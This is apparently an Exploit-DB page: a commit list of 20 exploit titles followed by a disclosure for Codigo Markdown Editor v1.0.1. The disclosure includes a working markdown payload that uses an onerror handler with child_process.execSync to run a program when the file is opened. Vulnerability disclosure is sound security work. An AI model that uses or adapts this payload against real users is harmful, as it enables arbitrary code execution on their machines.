8945b320b5
20 changes to exploits/shellcodes/ghdb Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution Cmaps v8.0 - SQL injection EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal) File Thingie 2.5.7 - Remote Code Execution (RCE) Intern Record System v1.0 - SQL Injection (Unauthenticated) Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module Jedox 2022.4.2 - Code Execution via RPC Interfaces Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks Jedox 2022.4.2 - Remote Code Execution via Directory Traversal KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE) Online Pizza Ordering System v1.0 - Unauthenticated File Upload pluck v4.7.18 - Stored Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE) Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS) Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
35 lines
No EOL
1.2 KiB
Text
35 lines
No EOL
1.2 KiB
Text
# Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution
|
|
# Date: 2023-05-03
|
|
# Exploit Author: 8bitsec
|
|
# Vendor Homepage: https://alfonzm.github.io/codigo/
|
|
# Software Link: https://github.com/alfonzm/codigo-app
|
|
# Version: 1.0.1
|
|
# Tested on: [Mac OS 13]
|
|
|
|
Release Date:
|
|
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
|
|
2023-05-03
|
|
|
|
Product & Service Introduction:
|
|
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
|
|
=3D=3D=3D=3D=3D=3D
|
|
A Markdown editor & notes app made with Vue & Electron
|
|
|
|
Technical Details & Description:
|
|
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
|
|
=3D=3D=3D=3D=3D=3D=3D
|
|
|
|
A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a =
|
|
user to execute arbitrary code by opening a specially crafted file.
|
|
|
|
Proof of Concept (PoC):
|
|
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
|
|
|
|
Arbitrary code execution:
|
|
|
|
Create a markdown file (.md) in any text editor and write the following pay=
|
|
load:
|
|
<video><source onerror=3D"alert(require('child_process').execSync('/System/=
|
|
Applications/Calculator.app/Contents/MacOS/Calculator').toString());">
|
|
|
|
Opening the file in Codigo will auto execute the Calculator application. |